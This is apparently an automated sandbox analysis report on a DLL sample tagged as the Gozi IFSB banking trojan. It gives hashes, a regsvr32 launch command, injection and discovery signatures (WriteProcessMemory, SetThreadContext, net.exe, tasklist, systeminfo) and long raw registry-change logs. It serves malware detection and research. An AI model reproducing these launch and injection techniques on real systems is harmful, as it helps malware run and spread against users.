Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-tg7znsdhfn
Target aa856dedda137f7419ecc36766ed74e3
SHA256 9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f

Threat Level: Known bad

The file aa856dedda137f7419ecc36766ed74e3 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Modifies registry class

Runs net.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Discovers systems in the same network

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 16:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 16:02

Reported

2022-08-03 16:05

Platform

win7-20220715-en

Max time kernel

39s

Max time network

44s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

Network

N/A

Files

memory/2024-54-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp

memory/1092-55-0x0000000000000000-mapping.dmp

memory/1092-56-0x0000000075B81000-0x0000000075B83000-memory.dmp

memory/1092-57-0x0000000010000000-0x000000001000E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 16:02

Reported

2022-08-03 16:05

Platform

win10v2004-20220721-en

Max time kernel

151s

Max time network

138s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4380 set thread context of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3116 set thread context of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 set thread context of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 set thread context of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 set thread context of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000e22218463a7d801383b808763a7d801383b808763a7d801bd5905000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323236663639386464356465663165353366313438383361363164643230303061323538316165653735373635613466333161396163376431393863313437340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000df799600320032003600660036003900380064006400350064006500660031006500350033006600310034003800380033006100360031006400640032003000300030006100320035003800310061006500650037003500370036003500610034006600330031006100390061006300370064003100390038006300310034003700340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323666363938646435646566316535336631343838336136316464323030306132353831616565373537363561346633316139616337643139386331343734000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a430370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a430370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000218ce28163a7d801218ce28163a7d801218ce28163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323236663639386464356465663165353366313438383361363164643230303061323538316165653735373635613466333161396163376431393863313437340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000df799600320032003600660036003900380064006400350064006500660031006500350033006600310034003800380033006100360031006400640032003000300030006100320035003800310061006500650037003500370036003500610034006600330031006100390061006300370064003100390038006300310034003700340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323666363938646435646566316535336631343838336136316464323030306132353831616565373537363561346633316139616337643139386331343734000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3a0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3a0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = a3b25a8b63a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008381428463a7d801864ea18a63a7d801864ea18a63a7d801401319000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000313937626664663938623930663135363830343766353339303231353937643331376564303261373266646130333532636237383736343431333435383737300000b20009000400efbe03559690035596902e000000000000000000000000000000000000000000000000002b195600310039003700620066006400660039003800620039003000660031003500360038003000340037006600350033003900300032003100350039003700640033003100370065006400300032006100370032006600640061003000330035003200630062003700380037003600340034003100330034003500380037003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31393762666466393862393066313536383034376635333930323135393764333137656430326137326664613033353263623738373634343133343538373730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a450370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a450370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = b1abff8163a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000079d9f08163a7d80179d9f08163a7d80179d9f08163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000613439323131633833616662313164653134323636363662376332343139373263623334643939373135643633353837396136646363373333316161323939610000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000872c8800610034003900320031003100630038003300610066006200310031006400650031003400320036003600360036006200370063003200340031003900370032006300620033003400640039003900370031003500640036003300350038003700390061003600640063006300370033003300310061006100320039003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61343932313163383361666231316465313432363636366237633234313937326362333464393937313564363335383739613664636337333331616132393961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3c0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3c0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\197bfdf98b90f1568047f539021597d317ed02a72fda0352cb78764413458770" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 7fdf2f8263a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = cf34488b63a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c0eb29be-1c77-40e1- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a49211c83afb11de1426666b7c241972cb34d99715d635879a6dcc7331aa299a" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f64f1dc4-a930-4385- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- C:\Windows\System32\RuntimeBroker.exe N/A
